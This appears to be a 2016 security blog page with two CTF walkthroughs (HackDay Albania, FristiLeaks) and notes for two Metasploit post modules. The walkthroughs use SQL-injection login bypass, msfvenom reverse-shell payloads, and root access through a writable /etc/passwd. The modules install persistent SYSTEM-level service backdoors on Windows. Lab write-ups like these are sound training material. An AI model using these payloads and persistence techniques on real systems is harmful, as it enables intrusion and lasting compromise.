Monday 5 December 2016

CTF HackDay: Albania - WalkThrough

Hey Readers,
So here i'm up with another CTF i've recently solved. It was kinda tricky (unexpectedly). But after irritating seniors with my problems related to it, i finally managed to solve it all :P .

Download > https://www.vulnhub.com/entry/hackday-albania,167/


So first thing first .. determining the target. I scanned network for live devices. (Our target was with IP "192.168.0.107").

Alright i did some intense scan on our target. Scanned for port range 0-10000. and finally ended up with 2 open ports 8008(apache server) and 22 (SSH). Also i got some directories.

$ sudo nmap -T4 -A -v -p 0-10000 192.168.0.107


Dirs i got :

/rkfpuzrahngvat/
/slgqvasbiohwbu/
/tmhrwbtcjpixcv/
/vojtydvelrkzex/
/wpkuzewfmslafy/
/xqlvafxgntmbgz/
/yrmwbgyhouncha/
/zsnxchzipvodib/
/atoydiajqwpejc/
/bupzejbkrxqfkd/
/cvqafkclsyrgle/
/unisxcudkqjydw/
/dwrbgldmtzshmf/
/exschmenuating/
/fytdinfovbujoh/
/gzuejogpwcvkpi/
/havfkphqxdwlqj/
/ibwglqiryexmrk/
/jcxhmrjszfynsl/
/kdyinsktagzotm/
/lezjotlubhapun/
/mfakpumvcibqvo/
/ngblqvnwdjcrwp/
/ohcmrwoxekdsxq/
/pidnsxpyfletyr/
/qjeotyqzgmfuzs/

I then opened link "192.168.0.107:8008" on which apache was running and got prompted with a message box "Ne qofte se jam UNE, e di se ku te shkoj " > Translated > "If I am, I know where to go".



I started visiting each dir and ended with a meme :/


But there i found a directory named "unisxcudkqjydw" which had a bit differ page asking me to redirect on page "/unisxcudkqjydw/vulnbank/" with message "IS there any /vulnbank/ in there ???". I visited that link and got a login page of some "Vuln Bank".


I tried some random combinations for auth bypass but unfortunately non of em worked, except one

Username : " '
Password : " '

Got prompted with an SQL Error. I thought it was my lucky shot :P and tried sqlmap and various other SQLi tools, but result was negative :/


Finally i downloaded a list for username and password and ran it over hydra. LOL my fate really worked (I dont use hydra and hate BruteForce attacks :/ :P)
I got a working combination

Username : ' or 'a' = 'a' --
Password : #


Okay!! so i was finally seeing some hope to solve it :).

Tried uploading php files directly, but that didn't worked. I immediately generated php backdoor via msfvenom and renamed it with extension ".php.jpg". Opened handler and executed the payload by visiting the link where it was saved to.


Then i just gained the bash shell with command :

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


I then checked all files and directory carefully if i could find some hint, but everything was useless. I thought config.php would work. I opened it and got user and pass to mysql with root credentials, thought it could be same credentials for root user login too, but result was negative.

After getting literally cooked up :P i checked for writable dirs on machine with command :

$  find / -writable -type f 2>/dev/null

LOL i noticed /etc/passwd was writable :P Bingo !! there i strikes with an idea ... "what if i manually add another user in passwd file ?" (Reference which helped me).

I then generated a hash password using openssl.

Useraname : dope
Passoword : dope


Now i just got back to meterpreter. Opened and edited /etc/passwd with option "edit". Added new user at bottom, and saved the file.

dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash

Edited /etc/passwd just look like :


Here i started having intention for getting escalated to root privilege soon.

And finally, I ran command " su ", entered password for user i just made, And Boom !! It worked :P finally i captured the flag :D

$ su dope  
$ id
$ cd /root && cat flag.txt


Special Thnaks to : VulnHub :) <3
Follow me on twitter : https://twitter.com/Indi_g34r

Sunday 13 November 2016

deploy_service_payload - Post MSF module For Deploy A Persistence Service Payload

[What Does This Module Do?] 
deploy_service_payload.rb uploads your payload.exe to target system (DEPLOY_PATH) and creates a service pointing to it (SERVICE_NAME). 

The service will auto-start with windows with Local/System privileges. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. "WARNING: This
module only supports .exe executables to upload".

[NOTE]

BUILD SERVICE PAYLOAD:
$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<Attacker Port> -a x86 --platform windows -f exe-service -o Program.exe

--WARNING: This module will not delete the payload deployed"
--WARNING: Note that only executables explicitly written to interface with the Service Control
--Manager should be installed this way. While SC will happily accept a regular non-service binary,
   you will receive the fatal Error 1053 when you attempt to start the service, please read the follow
--Article: How to Run Any Program as a Background Service in Windows

[INFO]



[INSTALLATION]

1* Download Module from {HERE}
2* Copy the ruby file in 
/{path}/metesploit-framework/modules/post/windows/manage/
3* Open msfconsole and issue command "reload_all" to reload paths.
4* use post/windows/manage/deploy_service_payload

[ADVANCED OPTIONS]



[USAGE]

NOTE: Im the follow example we are going to deploy a NETCAT executable on attacker machine (Its not mandatory the use of netcat [ nc.exe ], Default its to deploy a built-in service executable).

To be able to deploy a NETCAT client we need to activate module options 'USE_NETCAT'  | 'NC_LHOST' | 'NC_LPORT' and manually set a NETCAT lhandler to recibe the remote service connection...


-- DEPLOYING PAYLOAD :

1* set USE_NETCAT true
2* set NC_LPORT 31337
3* set NC_LHOST 192.168.0.100
4* set DEPLOY_PATH {deployment path in victim box}
5* set LOCAL_PATH /home/{user}/Desktop/nc.exe {executable to be uploaded}
6* set PAYLOAD_NAME nc.exe
7* set SERVICE_NAME infection
8* set SESSION 1

{Opening netcat Listener on Desired Port to recibe remote service connection}

$ sudo nc -lvp 31337

Expected Results :  


-- HIDING PAYLOAD :

1* set HIDDEN_ATTRIB true
2* set DEPLOY_PATH {deployment path in victim box}
3* set PAYLOAD_NAME nc.exe
4* set SESSION 1

Expected Results :


-- CHECKING SERVICE STATUS :

1* set SERVICE_STATUS true
2* set SERVICE_NAME infection
3* set SESSION 1

Expected Results :


-- DELETING REMOTE SERVICE : :

1* set DEL_SERVICE true
2* set SERVICE_NAME infection
3* set SESSION 1
--WARNING: This module will not delete the payload deployed"
Expected Results :


[VIDEO DEMO]




[Credits]

Module Author: pedr0 Ubuntu [r00t-3xp10it]
Special Thanks: Fatima Ferreira | Chaitanya



Sunday 30 October 2016

WSearch - Privilege Escalation via Weak Service Permissions (MSF Module)

Hi guys!!
So, almost after a week full of hard work we finally made our another post module for windows privilege escalation after MSI_privilege_escalation.

[What is WSearch ?]

SearchIndexer.exe is the Windows service that handles indexing of your files for Windows Search, which fuels the file search engine built into Windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature.  --Wikipedia

[INFO]

--Vendor : Microsoft WSearch (windows indexing) service [SearchIndexer.exe]
--Vulnerability Type : Persistence backdooring + Privilege Escalation
--Versions Affected : Windows XP, VISTA, 7, 8, 9, 10
--Severity : critical

--Description:
The WSearch service uses one executable.exe set in binary_path_name
and runs it has local/system at startup, this enables local privilege_escalation/persistence_backdooring.
To exploit this vulnerability a local attacker needs to replace the executable into the binary_path_name
of the service. 'Rebooting the system or restarting the service will run the malicious executable with
elevated privileges.

[What factors are affecting privilege escalation on windows with the help of this application ?]


                                                                     

We ran command "sc query WSearch" and got result that its state is always in running mode.
With this we can conclude our backdoor can execute all the time and keep system in illusion  replacing original process (WSearch), which could lead to persistence.



We can notice that application is running with NT/Authority privilege. so we can make it persistence with Administrator's privileges.



And finally, we can observe, application START_TYPE is set to AUTO_START mode. So that means that process will start on just after the boot. Also we can observe that BINARY_PATH_NAME can be replaced, so we can save our backdoor with application name i.e SearchIndexer.exe can be replaced with backdoor with same name as of application.

After concluding all these symptoms, we can now build a Metasploit's post module for privilege escalation.



[Advanced Options]



[Proof Of Concept]

--Installation Steps : 

  1. Download module from [ here ] & copy  persist_priv_Wsearch.rb to 
      ../{path}/metasploit-framework/modules/post/windows/escalate/persist_priv_Wsearch.rb
  2. open msfconsole and execute command "reload_all"

-- Exploitation Steps :

1. Get meterpreter session somehow
2. use post/windows/escalate/persist_priv_Wsearch
3. Rename your backdoor to "SearchIndexer.exe"
4. Set UPLOAD_PATH <path to backdoor.exe>
5. set session <session_id> 
6. exploit

 Expected Results : 


-- Reverting Everything To Normal : 

1. set DELETE_PERSISTENCE true
2. set session <session_id>
3. exploit

  Expected Results :



-- Checking Service Setting 

1. set SERVICE_STATUS true
2. exploit

    Expected Results : 



--[Credits] : Pedro Ubuntu [r00t 3xp10it]  | milton_barra | Chaitanya Haritash

Saturday 15 October 2016

CTF FristiLeaks: 1.3 - Walkthrough

I generally doesn't solves CTFs but after viewing walkthrough of one of my close friend i thought even i must give it a try :P (yea these days i had less work as compared to past some weeks and i watched too much movies ;_;).

So, i thought to try fristileak 1.3. Yea in beginning it was a bit puzzling but then i started having idea about further challenges one after another.


So First thing's first lets scan for live hosts in our network and grab open ports of the target host.


$ nmap -sn 192.168.0.0/24


$ nmap -T4 -A -v 192.168.0.100


OK ! so i got port 80 open here with 3 disallowed entries /cola , /sisi, /beer. Nice lets check em


Our main page, lets check for cola,sisi,beer :D 


Damn !! i got nothing except this meme :/ so here i tried some random links and finally found something on /fristi :D and yea it was a login page !!


here i begin checking page source and found some encrypted info, as much as my guess it was base64.




here i scrolled a bit up and found image being decoded, i decided to replace the encrypted code of image with the base64 i found apart from whole code.


Bingo !! after decoding base64 i got some weird text "keKKeKKeKkEkkEk". LOL easy guess "PASSWORD" :V . I then started searching for username and the one thing which diverted my mind the most, there was a note inside the source of page.


"TODO:
 We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
"

Now here nothing is looking so suspicious except the name of the one who left this comment "eezeepz".

i decided to make combination like 

username : eezeepz
password : keKKeKKeKkEkkEk

and got successful access :D wew !!

next i found only option to upload files but in image format (as i tried to it directly with .php format and that didn't worked).

So i generated php payload via msfvenom and changed its format to .php.png

$  sudo msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f raw


lol meterpreter i love u :P 





Lets try to gain access to bash shell :D 


Lets check users in home dir.


ok so there are 3 users in which i have permission to access "eezeepz" user's directory.


I did "ls -la" to list all dir with their respected permissions. There were so many files which were like some commands of /user/bin file but one file attracted my attention it was a txt file named "notes.txt" so i decided "cat notes.txt" to open it. and i found hints for next challenge.



ok so as it simply says, i have privilege to use commands like , chmod, df , cat, echo, ps, grep, egrep.
and i if i execute anyone of'em by making file "runthis" in /tmp dir, ill have my results delivered to file named "cronresult". LOL no guess it was sure that user admin is source to other user and eventually to root. "chmod 777 admin -R"

i decided to change permission of user admin's dir as i got privilege to use command "chmod". I executed following set of commands and got positive result as expected :P. 

$ echo “/usr/bin/../../bin/chmod –R 777 /home/admin” > /tmp/runthis 
$ ls -lah /home
$ ls -alh /home/admin

Found some suspicious text files which could be hint to another challenge.

-- whoisyourgodnow.txt
-- cryptedpass.txt
-- cryptpass.py

2 files were with some encrypted text in which one of em was in base64 and other was some random text (as much as i guessed) and the 3rd one was a python file to decode those pass. I decided to decoded one of'em, thought to gave a start with that base64 one.



So it was a password (guessed so , cos password for admin panel was also being disclosed in the same manner)

I decided to try for fristigod. and got successfully login :) 


after owning fistigod user i came one step more closer to root :D 


So i was in dir /var/fistigod as i unfortunately didn't found any hint in /home/fristigod/. There i noticed some hidden files one of them was .bash_history , i decided to open it and found some set of commands have been recorded in that file, like whosoever been there before me had used em, i thought to give them a try ( 3:) evil mind)

$ cat .bash_history 

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""


hmm ... 

Okay !! now i was a bit tired and decided to do "sudo -l" to get the $PATH


"/var/fristigod/.secret_admin_stuff/doCom" its was a clear hint that this file have some privilege to change permissions or to do some tasks from root's permission , cos its owned by root.

i decided to execute this file "doCom"

$  ./.secret_admin_stuff/doCom

and got prompted with result 

"Nice try , But wrong user ;)"

There i decided to use "sudo" with argument "-u"

$ sudo -u fristi ./.secret_admin_stuff/doCom

Again i got an hint of usage of this file 

"Usage: ./program_name terminal_command ..."

lol here i got some idea that this file will elevate privilege of files of our choice :P i decided to go with /bin/bash, after all who the hell doesn't wants /bin/bash have full privilege? ( 3:D evil mind)

$ sudo -u fristi ./.secret_admin_stuff/doCom /bin/bash

Volia!! 






Thx Aaditya Purani :D for being an inspiration bro :D post dedicated to u bro ^_^

=> Walkthrough to Billy Madison 1.1 By Aaditya Purani

---------

Okay !! So here i ends up this post :) hope you like it :)